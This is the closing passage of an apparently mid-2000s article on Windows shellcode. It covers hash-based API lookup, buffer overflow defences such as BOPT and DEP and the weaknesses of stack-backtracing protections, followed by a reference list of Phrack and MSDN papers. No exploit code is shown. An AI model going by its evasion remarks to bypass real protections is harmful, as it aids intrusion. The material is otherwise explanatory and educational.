please remove them from shellcode, they’re just extraneous. AsmTools has a button
that can calculate the simple hash function any given function name, all shellcode use
those hash functions for finding appropriate function calls.
All source code to all programs are accompanied with this article, you can peruse over
them ponderously before you execute them unwittingly.
Closing
Shellcode proved fatal in the terms of both full system compromise and overall
computer takeover. We have shown how this unmitigated disaster can lead to total
penetration of system. Working on the shellcode is still under way and too many
security-concerned people have jumped on the bandwagon of this type of attack point.
While vendors must take measures not to inflict damage on their proprietary software,
this seems to be a futile effort, seeing that such errors are hard to spot, and too many
often these errors go unnoticed from the eyes of programmers. Open source
movement may alleviate this problem to some extent, but still does not stop hackers
from pushing ahead with their findings.
Microsoft as a giant has done lot to save its reputation from the status quo. In this
way, it has initiated new technologies to fight the buffer overflow errors in Windows.
In Windows 2003, it has introduced BOPT (Buffer Overflow Prevention Technology)
and in Windows XP SP2 it has embedded DEP (Data Execution Prevention). BOPT
works in a similar fashion to those other commercial security tools such as Entercept
(now NAI Entercept) and Okena (now Cisco Security Agent). All rely on stack back
tracing and do not really create non-executable stack or heap segments. They hook
some OS level API calls and traverse through the stack frames and verify that the
return address belongs to a memory mapped file and not to an anonymous part of
memory, or they verify that the function call is originated from an instruction
immediately following a jump or call. While it does not hook all versions of a
particular function, nor it does this so deeply and thoroughly enough, it has a slew of
shortcomings that can lead to stack-trace mechanism evasion and again allow buffer
overrun.
Data execution prevention (DEP) is a set of hardware and software technologies that
perform additional checks on memory to help protect against malicious code exploits.
In Windows XP SP2, DEP is enforced by both hardware and software. Hardwareenforced DEP marks all memory locations in a process as non-executable unless the
17
location explicitly contains executable code. DEP helps prevent buffer overflow
attacks by intercepting them and raising an exception. Both “Advanced Micro
Devices™” (AMD) and Intel® Corporation have defined and shipped Windowscompatible architectures that are compatible with DEP. An additional set of data
execution prevention security checks have been added to Windows XP SP2. These
checks, known as software-enforced DEP, are designed to mitigate exploits of
exception handling mechanisms in Windows. Software-enforced DEP runs on any
processor which is capable of running Windows XP SP2. By default, softwareenforced DEP only protects limited system binaries, regardless of the hardwareenforced DEP capabilities of the processor.
While the battle between good and evil goes unremittingly, I hope to have presented a
brief account of state-of-the-art methods that have existed for quite a while.
Thanks for spending your time reading.
References
[1] The Last Stage of Delirium Research Group (LSD), Windows Assembly
Components
http://lsd-pl.net/papers.html.
[2] Microsoft Corporation. Microsoft Developer Network Library
http://msdn.microsoft.com/library/
[3] Phrack Magazine, History and Advances in Windows Shellcode
http://www.Phrack.org /show.php?p=62&a=7
[4] Phrack Magazine, Bypassing 3rd Party Windows Buffer Overflow Protection
http://www.Phrack.org /show.php?p=62&a=5
[5] Phrack Magazine, Smashing The Stack For Fun And Profit
http://www.Phrack.org /show.php?p=49&a=14
[6] Phrack Magazine, Win32 Buffer Overflows (Location, Exploitation and
Prevention)
http://www.Phrack.org /show.php?p=55&a=15
[7] Phrack Magazine, The Frame Pointer Overwrite
http://www.Phrack.org /show.php?p=55&a=8
[8] MSDN Magazine, Feb. 2002, “An In-Depth Look into the Win32 Portable
Executable File Format” by Matt Pietrek
[9] MSDN Magazine, Mar. 1994, “Peering Inside the PE: A Tour of the Win32
Portable Executable File Format” by Matt Pietrek
[10] Under the Hood, May 1996, Microsoft System Journals (MSJ), “TIB (Thread
Information Block) in the buff” by Matt Pietrek
[11] Under the Hood, Jan 1997, Microsoft System Journals (MSJ), SEH “A Crash
Course on the Depths of Win32™ Structured Exception Handling” by Matt Pietrek
[12] Under the Hood, Jan 2001, Microsoft System Journals (MSJ), “IA-64 Registers”
by Matt Pietrek
[13] The Undocumented Functions, by Tomasz Nowak
http://undocumented.ntinternals.net.
[14] Microsoft Tech Net, “Changes to Functionality in Microsoft Windows XP
Service Pack 2”, part 3, Memory Protection Technologies
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/default.mspx
[15] CodeGuru, “Three Ways to Inject Your Code into another Process” by Robert
Kuster.
http://www.codeguru.com/Cpp/W-P/system/processesmodules/
18
[16] The Code Project, “API Monitoring Unleashed” by Parag Paithankar
http://www.codeproject.com/system/api_monitoring_unleashed/
[17] Snort, The Open Source Network Intrusion Detection System
www.Snort.org
[18] Metasploit Framework, complete environment for writing, testing, and using
exploit code, www.metasploit.com
[19] Google the Oracle!
www.Google.com
19
Download